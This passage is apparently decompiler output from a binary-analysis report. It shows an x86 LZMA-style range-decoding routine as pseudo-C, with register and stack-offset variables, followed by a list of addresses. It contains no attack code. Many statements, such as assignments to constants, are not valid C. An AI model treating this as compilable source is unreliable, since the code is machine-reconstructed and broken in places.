												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                          0x00000000
                                          0x00406ce2
                                          0x00406ce2
                                          0x00406ce6
                                          0x00406cf3
                                          0x00406cfd
                                          0x00000000
                                          0x00406ce8
                                          0x00406ce8
                                          0x00406d23
                                          0x00406d26
                                          0x00406d29
                                          0x00406d2c
                                          0x00406d2c
                                          0x00406d2f
                                          0x00406d36
                                          0x00406d3b
                                          0x00406c1c
